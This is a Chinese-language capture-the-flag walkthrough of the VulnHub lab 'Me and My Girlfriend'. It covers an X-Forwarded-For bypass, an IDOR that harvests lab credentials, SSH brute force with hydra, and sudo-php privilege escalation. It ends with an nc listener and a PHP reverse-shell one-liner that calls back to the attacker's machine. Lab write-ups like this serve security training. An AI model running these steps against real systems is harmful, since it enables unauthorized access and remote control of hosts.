目录
介绍
系列:Me and My Girlfriend(此系列仅此一台)
发布日期: 2019年12月13日
难度: 初级
Flag : 2个
学习:BurpSuite在水平越权中的应用、SUID提权
靶机地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
信息收集
主机发现
nmap -sn 192.168.40.0/24
主机信息探测
信息探测:nmap -A -p- 192.168.40.147,开放了22、80端口。
网站探测
提示我们只能本地访问这个站点
解决办法1:使用插件 X-Forwarded-For Header
刷新网页,会进入到下图中的网站
解决办法2:使用BurpSuite
让每一个流经bp的流量,都添加请求头:X-Forwarded-For: localhost
我这里出了点bug,明明已经移除了插件 X-Forwarded-For Header,并且清空浏览器缓存了,bp抓包中不仅出现了插件中的“X-Forwarded-For: 127.0.0.1”,还出现了bp的“X-Forwarded-For: localhost”,既然如此,我就手动移除刚才设置的bp请求头好了。
打开的网站如下,发现可以注册账号,注册之后的url地址有点引人注目
sql注入-失败
没有单引号报错
额,还是寄出sqlmap试试吧
python .\sqlmap.py -u "http://192.168.40.147/index.php?page=profile&user_id=12" -p user_id --headers "X-Forwarded-For: 127.0.0.1"
没有测试出来什么东西。
水平越权-成功
测试修改id值,页面的内容也发生了变化。这个靶场,还真是简单,剩下的八成就是测试出所有的账号密码,然后ssh爆破了。
获取到所有账号密码
直接使用bp爆破,不过需要添加一个过滤器,筛选一下结果。分别筛选出用户名和密码
开始爆破,并导出结果
得到:
| 用户名 | 密码 |
|---|---|
| eweuhtandingan | skuyatuh |
| aingmaung | qwerty!!! |
| sundatea | indONEsia |
| sedihaingmah | cedihhihihi |
| alice | 4lic3 |
| abdikasepak | dorrrrr |
| superman | 123456 |
SSH爆破
由于用户名和密码是对应好的关系,因此hydra中可以使用-C参数来爆破比较好。
SSH登录
Flag1
倒数第三行,得到提示,需要提权得到root家目录里面的另一个flag
提权拿到Flag2
寻找sudo权限,我发现Alice可以在没有root密码的情况下使用sudo运行php命令。我一般是使用php反弹shell,这里发现老外用的是别的方法,顺带着介绍一下。
方法1:php命令执行
我创建了一个变量并添加了 shell 名称 /bin/bash,我们的下一步是使用 sudo /usr/bin/php/php 执行变量命令。
方法2:php反弹shell
kali开启nc监听
nc -lnvp 4444
靶机反弹shell
sudo php -r '$sock=fsockopen("192.168.40.129",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
参考
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134253.html
